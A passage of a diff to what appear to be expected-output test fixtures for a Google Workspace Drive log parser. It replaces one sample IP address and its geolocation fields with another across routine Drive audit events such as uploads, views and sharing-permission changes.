+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1182,27 +1110,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13215,
+        "log.offset": 13197,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1223,7 +1147,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "creation"
@@ -1245,27 +1169,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13922,
+        "log.offset": 13903,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1286,7 +1206,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "info"
@@ -1309,27 +1229,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14624,
+        "log.offset": 14604,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1352,7 +1268,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1378,27 +1294,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 15366,
+        "log.offset": 15345,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1421,7 +1333,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1448,27 +1360,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 16275,
+        "log.offset": 16253,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1491,7 +1399,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1518,27 +1426,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 17233,
+        "log.offset": 17210,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1561,7 +1465,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1587,10 +1491,10 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18189,
+        "log.offset": 18165,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
@@ -1598,17 +1502,13 @@
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1631,7 +1531,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1657,10 +1557,10 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19117,
+        "log.offset": 19092,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
@@ -1668,17 +1568,13 @@
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1701,7 +1597,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1723,27 +1619,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 20060,
+        "log.offset": 20034,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "owner"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
